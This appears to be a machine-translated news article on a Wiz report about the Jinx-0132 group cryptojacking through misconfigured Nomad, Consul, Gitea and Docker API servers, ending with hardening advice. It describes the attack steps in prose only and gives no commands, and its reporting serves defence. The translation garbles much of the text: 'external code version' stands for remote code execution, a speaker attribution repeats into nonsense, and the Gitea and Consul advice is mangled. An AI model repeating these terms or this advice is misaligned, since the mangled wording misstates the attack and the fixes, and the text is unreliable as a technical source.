Researchers claim that they have discovered the first case of threat actors who use incorrectly configured Hashicorp Nomad implementations as an attack vector.
The popular DevOps platform, with which companies can implement and manage containers and non-containerized applications, is according to other infrastructure, including Gitea, Consul and Docker API, focused, according to cloud protection provider WIZ.
The threat group in question, mentioned by WIZ as Jinx-0132, is the operation of misconfigurations and vulnerabilities in these DevOps tools for cryptojacking, the report claimed.
Based on WIZ data, a quarter (25%) of all cloud environments have at least one of the intended technologies. Of the environments that these tools use, 5% set them directly to the internet, and under these implementations, 30% is apparently incorrectly configured.
Read more about cryptojacking: malicious Microsoft versus code -extensions used in cryptojacking -campaign
Jinx-0132 attackers benefit from the job queue of Nomad, with which users can submit tasks for execution by nodes registered with the Nomad server.
“Standard -and critical, if not re -configured by administrators -every user can make and perform these tasks with access to the Nomad Server API. This standard configuration means that unlimited access to the Server -Pi can be linked to external code version (RCE) possibilities on the server,” said Wizver, said Wizver, said connected points.
In this way the threat actors make several new jobs on compromised hosts to download the XMRIG miner directly from the public GitHub -Repository, to unpack the archive, to grant permissions of implementation and implementation.
They also abuse another Hashicorp tool, consul, which is designed to help DevOps teams to help the network connectivity between services and between on-premises and multi-cloud environments and runimes.
In particular, they hijack the Health Check Service to carry out Bash assignments and to download and carry out XMRIG -Payloads.
‘Unless ACLS [access control lists] have been configured or security functions supplied by Hashicorp have been enabled, each user with external access to the server can register services and health controls and abuse these functionality for external code version, ”warned WIZ.
Jinx-0132 also operates CVE-2020-14144 in older versions of Open Source Github alternative Gitea, as well as incorrectly configured versions of Docker Engine API. In the latter case, according to the report, they have been able to make containers that launch crypto-miner images.
Best practices for DevOps
To prevent it from becoming another victim of Jinx-0132, Wiz insisted on customers of the aforementioned DevOps tools to do the following:
- Nomad: Implement the ACLS and other security functions in the Security Model Section of the Official Documentation
- Gitea: Save public gitea agencies up -To -date to prevent the exploitation of RCE vulnerabilities and not to engage git hooks or to leave the installation unlocked unless absolutely necessary
- Consul: Switch on the security functions that are stated in the Secure Consul section of the official documentation, including the disable of script controls and limiting the HTTP -API to bind to “Localhost” where possible only where possible
- Docker API: Do not bind the Docker API to 0.0.0.0 and do not expose the API to the internet